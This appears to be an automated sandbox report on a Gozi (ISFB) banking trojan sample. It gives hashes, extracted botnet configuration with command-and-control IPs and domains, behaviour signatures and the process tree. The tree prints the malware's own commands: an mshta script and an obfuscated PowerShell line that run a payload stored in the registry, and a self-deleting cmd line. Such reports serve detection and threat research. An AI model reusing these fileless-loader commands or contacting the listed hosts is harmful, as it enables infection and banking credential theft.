gozi | 5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2

Analysis

max time kernel
150s
max time network
125s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
03-10-2023 11:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

294KB
MD5

bb35f8c1a3236ad31c754cdfe795d57f
SHA1

b744f8ae31e2b3f7c3b72b9615823a3a3ad02989
SHA256

5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2
SHA512

fcb8f4458b7a5a4a2536a22ad55e4564ffe3d3327e4eefca10a30bc490ae29c8cc31760e07d567de53150090c84bb171209f1f3811f22d3f69545beb15edd0b0
SSDEEP

3072:4e6lIjmvg7aaCIg0JHk8D8uNhUqHAMMQKL2H/NHIS:4blIavYaaCIg6h/NhUDAHlH

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process	target process
PID 2280 set thread context of 1276	2280	powershell.exe	Explorer.EXE
PID 1276 set thread context of 1776	1276	Explorer.EXE	cmd.exe
PID 1276 set thread context of 1908	1276	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
1456	client.exe
2280	powershell.exe
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE
1276	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1276 Explorer.EXE
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

powershell.exeExplorer.EXE

pid process

2280 powershell.exe
1276 Explorer.EXE
1276 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2280 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1276 Explorer.EXE

pid	process
1276	Explorer.EXE

pid	process
2280	powershell.exe
1276	Explorer.EXE
1276	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2280	powershell.exe

pid	process
1276	Explorer.EXE

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXE

description	pid	process	target process
PID 3016 wrote to memory of 2280	3016	mshta.exe	powershell.exe
PID 3016 wrote to memory of 2280	3016	mshta.exe	powershell.exe
PID 3016 wrote to memory of 2280	3016	mshta.exe	powershell.exe
PID 2280 wrote to memory of 2860	2280	powershell.exe	csc.exe
PID 2280 wrote to memory of 2860	2280	powershell.exe	csc.exe
PID 2280 wrote to memory of 2860	2280	powershell.exe	csc.exe
PID 2860 wrote to memory of 1096	2860	csc.exe	cvtres.exe
PID 2860 wrote to memory of 1096	2860	csc.exe	cvtres.exe
PID 2860 wrote to memory of 1096	2860	csc.exe	cvtres.exe
PID 2280 wrote to memory of 2748	2280	powershell.exe	csc.exe
PID 2280 wrote to memory of 2748	2280	powershell.exe	csc.exe
PID 2280 wrote to memory of 2748	2280	powershell.exe	csc.exe
PID 2748 wrote to memory of 776	2748	csc.exe	cvtres.exe
PID 2748 wrote to memory of 776	2748	csc.exe	cvtres.exe
PID 2748 wrote to memory of 776	2748	csc.exe	cvtres.exe
PID 2280 wrote to memory of 1276	2280	powershell.exe	Explorer.EXE
PID 2280 wrote to memory of 1276	2280	powershell.exe	Explorer.EXE
PID 2280 wrote to memory of 1276	2280	powershell.exe	Explorer.EXE
PID 1276 wrote to memory of 1776	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1776	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1776	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1776	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1776	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1776	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1908	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1908	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1908	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1908	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1908	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1908	1276	Explorer.EXE	cmd.exe
PID 1276 wrote to memory of 1908	1276	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1276

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1456

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Smbn='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Smbn).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\24F5F9D3-33BE-F6ED-DD98-178A614C3B5E\\\StopDiagram'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lqcsjiqy -value gp; new-alias -name uwrdijti -value iex; uwrdijti ([System.Text.Encoding]::ASCII.GetString((lqcsjiqy "HKCU:Software\AppDataLow\Software\Microsoft\24F5F9D3-33BE-F6ED-DD98-178A614C3B5E").ListMail))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4hk6gtmg.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2860

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6A8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE698.tmp"
5⤵
PID:1096

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pag2dolt.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE783.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE782.tmp"
5⤵
PID:776

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
PID:1776

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4hk6gtmg.dll
Filesize
3KB

MD5
60a5640f6d0e40f889f90ed69ddc2f41

SHA1
abdecbdf06039770e8ee00d252d8aacc14f63f1b

SHA256
d433de221b7137502f34e36d9442f6a96a61dcf257f8153d71ecda80c981b684

SHA512
c03ec2f6c86b55ca9f2e3bf2d5cfc3ce15a10d54ef031d4233d0e8f749f24844dbe7fc9bce690226d09cca86bd0cf22bf63f0c2ba11cdac235efd7f585736e8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\4hk6gtmg.pdb
Filesize
7KB

MD5
fc0f53bfddaed21e59bb6944403cc48d

SHA1
7f9c23454ff55355aa4b409e5e0e6ef8736c2695

SHA256
f2f7fb1fe08bed8182da31226fe3820902c3d36f27e11dca6f343c65e342dbd0

SHA512
82a8e90909508a083fe583374a77dbe0c45b4ff80ab5b29f66ee5809775d663b59875d96ea2eddc49b7bdb90b52ba68062eb33ad966627c56dc48cf4ee732d85

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE6A8.tmp
Filesize
1KB

MD5
e0b2f43faa06aa4cc1956b1a92615e28

SHA1
98997b578a63288ceb93793cee6a19aead0146f1

SHA256
21ddb642bb19c0c9317ebaf10f5044cccb041777f18474b3b388efa21e1bd0bb

SHA512
30f6f5cb5fc98f6c1e09177b10d3f16fe6b7b56b8dbfde4a6f0d6c3b44b482223afd7f5863d0ca84450ac3e9f93a47d70a93158b42615e9caf44ee460286fd53

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE783.tmp
Filesize
1KB

MD5
4d3d153e118c8c8508e546843dfa97f0

SHA1
25868b6f6dcfcfb9578ef93330cfbc44f7742afb

SHA256
1b7d769b26b6737b544b027ba5e92951bdbdc3486adadc46bfd5d1c2d9a40fca

SHA512
3e2137082566ed0259633073c68d7a8509331bad51ed5c53e2f2a39dc18e0b4547c4e69afc22a8f3a196ca00183cc65e33d821e16dd206f25007fb01b29a3533

Download Submit
C:\Users\Admin\AppData\Local\Temp\pag2dolt.dll
Filesize
3KB

MD5
47a5fcb1548e65a42bb69afcdbd557b8

SHA1
b35567635562e5823131b991b95dd6b0608f6764

SHA256
50d37d29aa07da0c92616d445a1cd1a6a8ec2ab70b2a93a73bed6e9e7b5a15f3

SHA512
b17ef35f0e4f950aea31c2df0868f80ac54c542dec420638e149e5d358e6335f14b554dfa37da001d3ccf70a9910938b3e5866d4c267658335e27c88abd2b40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\pag2dolt.pdb
Filesize
7KB

MD5
89fe8df7c1dd7fa8f1befc718ce11a3e

SHA1
5a029984f758a5105cdbcc7353b20b3a69cc83e9

SHA256
6b1ac0b436c0de63c9c5911b186b28c31ca9df4381a036ff4465b6a9a745f000

SHA512
f74a84a5f7c7c053544f4d9f5e3d368d182dc27a8d61e00af1f85abaa82b0c59ca8596d6667c24449512edc0c8b1c617e75433f684647d9c18b7dccb1b8a7a6c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4hk6gtmg.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4hk6gtmg.cmdline
Filesize
309B

MD5
928eeea03cc6212b6164e52db15a7ae3

SHA1
461532e8b2deb48912249ee9c0b27c8b56d6b955

SHA256
4badeb274f65e2850219ef0def6581fa8dfd107adcd9bb264f84747d3c4268af

SHA512
a7329657addadb1a997d76aa748442ee40607b320c15cf90a2ab3b677e900a71ad49022f846834169b2c061da6d2f6b80e41fe9fadb239e8bb510a0e680477d0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE698.tmp
Filesize
652B

MD5
c0336a5f7e84c5e6a139473dcf056b86

SHA1
e8c190b6db523ba9f9b286d9c671c3a29ebbdbb6

SHA256
fe286b037c7e67cd050064f72fc6be40952c6789bf4be6c68e90b9219efecc5a

SHA512
2e34aba3e6491bbd9353c6ec2c791c467e2f2a1afeca6ce3955746bb4bebb0ba607b081b6a2590203f459b7841cd9bf07394b0d20309c462843108ef14a75173

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE782.tmp
Filesize
652B

MD5
cd705d41869ecb99ea237e8382fb6ed3

SHA1
3647c8fe6260f03e5c0a2f357a3872f0b1d366d7

SHA256
840d279cf726206d89bccafe1f680aa98f358015db082ecefac4239698e6892c

SHA512
c8513a2c0369f3ea6fb4b31c48e04c1f43e0113d85a057ad0bf4722ea9b90d9e95a8602d8932f8bec20abb7a3758ad6cddf874491105e945adf2d5ea67780f4b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pag2dolt.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pag2dolt.cmdline
Filesize
309B

MD5
1e33a1bb5b71f701d31ed7a77875c669

SHA1
92d11f0839948a9aa68d0408ef0528faf7d58a71

SHA256
e6ac366a125a5365295a6507a657e0720526b7f34ba0499d6b4df978cd010b00

SHA512
08605ccf5bfba527f9bf5f5a78f6638223f584014269c4903f2721a84e532109a5858343a16c9d06cbc036fe94fea7aa6df66c4e17d47ff243d58b6eb490d402

Download Submit
memory/1276-86-0x0000000003D60000-0x0000000003E04000-memory.dmp

Filesize
656KB

Download
memory/1276-60-0x0000000003D60000-0x0000000003E04000-memory.dmp

Filesize
656KB

Download
memory/1276-61-0x0000000002B50000-0x0000000002B51000-memory.dmp

Filesize
4KB

Download
memory/1456-4-0x00000000002D0000-0x00000000002DD000-memory.dmp

Filesize
52KB

Download
memory/1456-7-0x00000000023C0000-0x00000000024C0000-memory.dmp

Filesize
1024KB

Download
memory/1456-2-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1456-80-0x00000000023C0000-0x00000000024C0000-memory.dmp

Filesize
1024KB

Download
memory/1456-3-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/1456-1-0x00000000023C0000-0x00000000024C0000-memory.dmp

Filesize
1024KB

Download
memory/1456-13-0x0000000004A30000-0x0000000004A32000-memory.dmp

Filesize
8KB

Download
memory/1456-8-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/1776-73-0x0000000001C20000-0x0000000001CC4000-memory.dmp

Filesize
656KB

Download
memory/1776-72-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

Filesize
4KB

Download
memory/1776-74-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/1908-82-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download
memory/1908-85-0x0000000000160000-0x00000000001F8000-memory.dmp

Filesize
608KB

Download
memory/1908-81-0x0000000000160000-0x00000000001F8000-memory.dmp

Filesize
608KB

Download
memory/2280-23-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2280-39-0x00000000028B0000-0x00000000028B8000-memory.dmp

Filesize
32KB

Download
memory/2280-56-0x00000000028C0000-0x00000000028C8000-memory.dmp

Filesize
32KB

Download
memory/2280-18-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/2280-64-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2280-70-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2280-71-0x0000000002960000-0x000000000299D000-memory.dmp

Filesize
244KB

Download
memory/2280-59-0x0000000002960000-0x000000000299D000-memory.dmp

Filesize
244KB

Download
memory/2280-25-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2280-22-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2280-24-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/2280-21-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2280-20-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2280-19-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2748-47-0x0000000000590000-0x0000000000610000-memory.dmp

Filesize
512KB

Download